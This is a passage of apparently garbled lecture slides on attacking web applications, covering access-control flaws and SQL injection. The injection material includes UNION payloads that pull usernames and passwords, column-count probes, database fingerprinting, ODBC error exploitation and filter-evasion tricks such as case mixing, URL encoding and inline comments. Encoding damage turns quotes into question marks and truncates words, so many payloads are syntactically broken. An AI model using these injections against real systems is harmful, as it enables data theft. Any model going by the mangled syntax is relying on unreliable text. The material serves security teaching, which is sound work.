【正文】 ls ? Common Vulnerabilities ? Logic Flaws / False Assumptions ? Multistage functionality ? Example: User accesses “User Maintenance Menu” and selects “Add User” ? Page verifies that user has privileges to add users ? Forwards user to the “Add User” page ? But this one is not protected ? Attacker needs to go directly to this page Attacking Access Controls ? Common Vulnerabilities ? Use static files ? Example: Web publisher interacts with user to sell / ascertain right to view a given document ? Once user has gained right to view, user is given the link ? ? This is a static resource that cannot verify the rights again Attacking Access Controls ? Common vulnerabilities ? Insecure access control mechanisms ? Example: ? Example: Use of the referer header ? Hacking steps: ? Use site mapping to find / guess hidden resources ? Use two different level user accounts to look for distinguishing parameters ? Test for the use of the referer field ? Review client side scripts and hidden forms to find reference to hidden functionality Code Injection ? Hacking steps: ? Supply unexpected syntax to cause problems ? Identify any anomalies in the application response ? Examine any error messages ? Systematically modify input that causes anomalous behavior to form and verify hypotheses on the behavior of the system ? Try safe mands to prove existence of injection flaw ? Exploit the flaw Code Injection Into SQL ? Gain knowledge of SQL ? Install same database as used by application on local server to test SQL mands ? Consult manuals on error messages ? Detection: ? Cause an error condition: ? String Data ? Submit a single quotation mark ? Submit two single quotation marks ? Use SQL concatenation characters ? ? | | ? FOO (oracle) ? ? + ? FOO (MSSQL) ? ? ? FOO (No space between quotation marks) (MySQL) ? Numeric Data ? Replace numeric value with arithmetic (Instead of 5, submit 2+3) ? Use sqlspecific keywords ? 67ASCII(?A?) is equivalent to 2 in SQL ? Beware of special meaning of characters in such as ?amp。?, ?=?, … Code Injection Into SQL ? Detection: ? Cause an error condition: ? Select / Insert Statements ? Entry point is usually ?where? clause, but ?order by? etc. might also be injected ? Example: admin? or 1==1 ? Example injections into user name field for injection into insert, where we do not know the number of parameters: ? foo ? ) ? foo ? , 1) – ? foo ? , 1 , 1) – ? foo ? , 1 , 1 , 1) – ? Here we rely on 1 being cast into a string. Code Injection Into SQL ? Union operator ? SELECT author, title, year FROM books WHERE publisher = ?Wiley? ? Insert ? Wiley? UNION SELECT username, password, uid FROM users ? to obtain ? SELECT author, title, year FROM books WHERE publisher = ?Wiley? Union SELECT username, password, uid FROM users? ? Pay attention to error messages in order to reformulate the string more successfully ? Try ? ? UNION SELECT NULL ? ? ? UNION SELECT NULL, NULL ? ?UNION SELECT NULL, NULL, NULL Code Injection Into SQL ? You can try ?order by? in order to find out how many rows are in the table: ? ORDER BY 1 ? ORDER BY 2 ? ORDER BY 3 ? Next, find out which columns have the string data type by injection ? UNION SELECT ?a?, NULL, NULL ? UNION SELECT NULL, ?a?, NULL ? UNION SELECT NULL, NULL, ?a? Code Injection Into SQL ? Fingerprinting the database ? Important because of differences in SQL supported ? .: Oracle SQL requires a from clause in all selects ? Obtain version string of database from ? UNION SELECT banner,NULL,NULL from v$version ? Use different ways in which databases concatenate strings: ? Oracle: ?Tho?||?mas? ? MSSQL: ?Tho?+?mas? ? MySQL: ?Tho? ?mas? (with space between quotes) ? Use different numbering formats ? Oracle: BITAND(1,1)BITAND(1,1) ? MSSQL: @@PACKRECEIVED@@PACK_RECEIVED ? MySQL: CONNECTION_ID() CONNECTION_ID() Code Injection Into SQL ? MSSQL: Exploiting ODBC Error Messages ? Inject ? having 1=1 ? Generates error message Microsoft OLE DB Provider for ODBC Drivers error ?80040e14? (Microsoft) [ODBC SQL Server Driver] [SQL Server] Column ?? is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause Code Injection Into SQL ? MSSQL: Exploiting ODBC Error Messages ? Inject ? ? group by having 1=1 ? Generates error message Microsoft OLE DB Provider for ODBC Drivers error ?80040e14? (Microsoft) [ODBC SQL Server Driver] [SQL Server] Column ?? is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause Code Injection Into SQL ? MSSQL: Exploiting ODBC Error Messages ? … ? Inject ? ? group by , , , having 1=1 ? Generates no error message ? No proceed injecting union statements to find data types for each column ? Inject ? ? union select sum(username) from users? Code Injection Into SQL ? Bypassing filters: ? Avoiding blocked characters ? The single quotation mark is not required for injection into a numeric data field ? If the ment character is blocked, craft injection so that it does not break the surrounding query ? Instead of ? ? or 1 = 1 ? use ? ? or ?a? = ? a ? MSSQL does not need semicolons to separate several mands in a batch Code Injection Into SQL ? Bypassing filters: ? Circumventing simple validation ? If a simple blacklist is used, attack canonicalization and validation. ? . instead of select, try ? SeLeCt ? SELSELECTECT ? %53%45%4c%45%43%54 ? %2553%2545%254c%2545%2543%2554 ? Use inline ments ? SEL/*foo*/ECT (valid in MySQL) ? Manipulate blocked strings ? ?adm?| |?in? (valid in Oracle) ? Use dynamic execution ? exec(?select * from users?) works in MSSQL Code Injection Into SQL ? Bypas